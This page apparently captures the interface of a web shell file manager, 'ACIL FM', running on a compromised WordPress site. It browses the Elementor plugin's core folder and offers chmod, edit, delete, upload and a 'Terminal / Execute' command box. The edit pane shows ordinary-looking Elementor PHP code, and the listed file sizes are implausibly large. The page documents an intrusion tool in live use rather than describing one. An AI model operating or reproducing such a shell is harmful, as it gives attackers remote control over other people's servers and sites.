ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/elementor/core
/
home
mhhtmff
www
site
wp-content
plugins
elementor
core
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
admin
-
chmod
Open
Rename
Delete
app
-
chmod
Open
Rename
Delete
base
-
chmod
Open
Rename
Delete
behaviors
-
chmod
Open
Rename
Delete
breakpoints
-
chmod
Open
Rename
Delete
common
-
chmod
Open
Rename
Delete
debug
-
chmod
Open
Rename
Delete
document-types
-
chmod
Open
Rename
Delete
dynamic-tags
-
chmod
Open
Rename
Delete
editor
-
chmod
Open
Rename
Delete
experiments
-
chmod
Open
Rename
Delete
files
-
chmod
Open
Rename
Delete
frontend
-
chmod
Open
Rename
Delete
kits
-
chmod
Open
Rename
Delete
logger
-
chmod
Open
Rename
Delete
page-assets
-
chmod
Open
Rename
Delete
responsive
-
chmod
Open
Rename
Delete
role-manager
-
chmod
Open
Rename
Delete
schemes
-
chmod
Open
Rename
Delete
settings
-
chmod
Open
Rename
Delete
upgrade
-
chmod
Open
Rename
Delete
utils
-
chmod
Open
Rename
Delete
documents-manager.php
18.7 MB
chmod
View
DL
Edit
Rename
Delete
modules-manager.php
3 MB
chmod
View
DL
Edit
Rename
Delete
wp-api.php
1.11 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/elementor/core/wp-api.php
<?php namespace Elementor\Core; use Elementor\Core\Utils\Collection; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * This class is responsible for the interaction with WordPress Core API. * The main benefit is making it easy to mock in testing * and it can help to create unit tests without the hustle of mocking WordPress itself. */ class Wp_Api { /** * @var Collection */ private $plugins; /** * @return Collection */ public function get_plugins() { if ( ! $this->plugins ) { $this->plugins = new Collection( get_plugins() ); } return $this->plugins; } /** * @return Collection */ public function get_active_plugins() { return $this->get_plugins() ->only( get_option( 'active_plugins' ) ); } /** * @return object|array */ public function plugins_api( $action, $args ) { return plugins_api( $action, $args ); } /** * @return bool */ public function is_plugin_active( $plugin ) { return is_plugin_active( $plugin ); } /** * @return bool|int|null|true */ public function activate_plugin( $plugin ) { return activate_plugin( $plugin ); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply